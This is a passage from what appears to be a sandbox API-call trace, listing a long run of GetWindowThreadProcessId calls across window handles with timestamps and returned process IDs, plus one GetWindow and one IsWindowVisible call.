	[0945.657] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.657] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.657] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x460
	[0945.657] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.657] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0945.657] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x2440
	[0945.657] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x24d8
	[0945.657] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1aa4
	[0945.657] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1ff0
	[0945.658] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1a84
	[0945.658] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1fb0
	[0945.658] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1e10
	[0945.658] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x23a8
	[0945.658] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1f24
	[0945.658] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x21ec
	[0945.658] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x2320
	[0945.658] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1fd4
	[0945.658] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1880
	[0945.658] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1b18
	[0945.659] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1d6c
	[0945.659] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x233c
	[0945.659] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x2368
	[0945.659] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x2124
	[0945.659] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x22f0
	[0945.659] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x22ac
	[0945.659] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1cdc
	[0945.659] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x10f0
	[0945.659] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1f18
	[0945.659] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x20a8
	[0945.660] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x2004
	[0945.660] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1f88
	[0945.660] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1f84
	[0945.660] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x2050
	[0945.660] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1e04
	[0945.660] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1ecc
	[0945.660] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1e64
	[0945.660] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1b58
	[0945.660] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1e94
	[0945.660] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1e28
	[0945.661] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1df8
	[0945.661] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1da8
	[0945.661] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1c70
	[0945.661] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x163c
	[0945.661] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1a10
	[0945.661] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x186c
	[0945.661] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1d74
	[0945.661] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4c8
	[0945.661] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1960
	[0945.661] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1ce4
	[0945.662] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1b24
	[0945.662] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x14e0
	[0945.662] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x17f0
	[0945.662] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x854
	[0945.662] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1268
	[0945.662] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1624
	[0945.662] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1b9c
	[0945.662] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x16f4
	[0945.662] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x145c
	[0945.662] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x17d0
	[0945.663] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1d28
	[0945.663] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xcb8
	[0945.663] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1190
	[0945.663] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x3a8
	[0945.663] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1bd0
	[0945.663] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1bfc
	[0945.663] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1a78
	[0945.663] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1b90
	[0945.663] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1b04
	[0945.663] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1b34
	[0945.664] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1b64
	[0945.664] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1bb0
	[0945.664] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1acc
	[0945.664] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1a2c
	[0945.664] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x19a8
	[0945.664] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1944
	[0945.664] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x18c8
	[0945.664] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x18ac
	[0945.664] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x18ec
	[0945.664] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1898
	[0945.665] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xc98
	[0945.665] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x153c
	[0945.665] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1808
	[0945.665] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x12a4
	[0945.665] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1740
	[0945.665] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x16c4
	[0945.665] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1820
	[0945.665] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x16ac
	[0945.665] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1858
	[0945.665] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1664
	[0945.666] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x10b4
	[0945.666] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x10ac
	[0945.666] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x10ec
	[0945.666] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1068
	[0945.666] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x17e0
	[0945.666] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x102c
	[0945.666] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x17a4
	[0945.666] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1050
	[0945.666] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1694
	[0945.666] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1770
	[0945.667] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1720
	[0945.667] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x165c
	[0945.667] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1578
	[0945.667] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x16c0
	[0945.667] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x161c
	[0945.667] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1638
	[0945.667] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x15c8
	[0945.667] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1554
	[0945.667] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1674
	[0945.667] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1520
	[0945.668] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x14bc
	[0945.668] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xf8c
	[0945.668] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xe9c
	[0945.668] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1434
	[0945.668] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x14ec
	[0945.668] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xfcc
	[0945.668] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x12ac
	[0945.668] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1484
	[0945.668] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x934
	[0945.668] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xc0c
	[0945.669] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xb08
	[0945.669] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x948
	[0945.669] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1178
	[0945.669] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x13e0
	[0945.670] GetWindow (hWnd=0x105fa, uCmd=0x4) returned 0x0
	[0945.671] IsWindowVisible (hWnd=0x105fa) returned 0
	[0945.671] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xcd0
	[0945.671] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x13fc
	[0945.671] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xdc8
	[0945.671] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xc18
	[0945.671] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xc2c
	[0945.671] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xa1c
	[0945.671] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1244
	[0945.671] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xdb0
	[0945.671] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1398
	[0945.672] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1358
	[0945.672] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1370
	[0945.672] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1340
	[0945.672] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x130c
	[0945.672] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x12c0
	[0945.672] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x12e4
	[0945.672] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1270
	[0945.672] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1298
	[0945.672] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x120c
	[0945.672] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x122c
	[0945.673] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x11c4
	[0945.673] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x11b0
	[0945.673] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1188
	[0945.673] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1148
	[0945.673] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1160
	[0945.673] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x10fc
	[0945.673] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xe34
	[0945.673] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xea4
	[0945.673] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x514
	[0945.673] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xe48
	[0945.673] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xbc8
	[0945.674] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xdf8
	[0945.674] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x318
	[0945.674] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xcac
	[0945.674] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x8bc
	[0945.674] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xf9c
	[0945.674] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xf48
	[0945.674] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xe40
	[0945.674] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xecc
	[0945.674] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xeb8
	[0945.674] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xe80
	[0945.675] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xe98
	[0945.675] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xe60
	[0945.675] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xee4
	[0946.365] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xf00
	[0946.365] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xdf0
	[0946.365] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xe1c
	[0946.365] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xdd0
	[0946.365] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xd94
	[0946.365] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xd74
	[0946.365] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xd00
	[0946.365] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xcd8
	[0946.366] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xc84
	[0946.366] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xca4
	[0946.366] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xc64
	[0946.366] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xc24
	[0946.366] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xb84
	[0946.366] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xbac
	[0946.366] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x384
	[0946.366] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xab8
	[0946.366] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x33c
	[0946.366] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xa44
	[0946.366] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xa64
	[0946.367] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x8a8
	[0946.367] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xaf0
	[0946.367] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x88c
	[0946.367] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xb04
	[0946.367] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x910
	[0946.367] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x230
	[0946.367] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xac0
	[0946.367] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xab4
	[0946.367] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xaac
	[0946.367] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x3d0
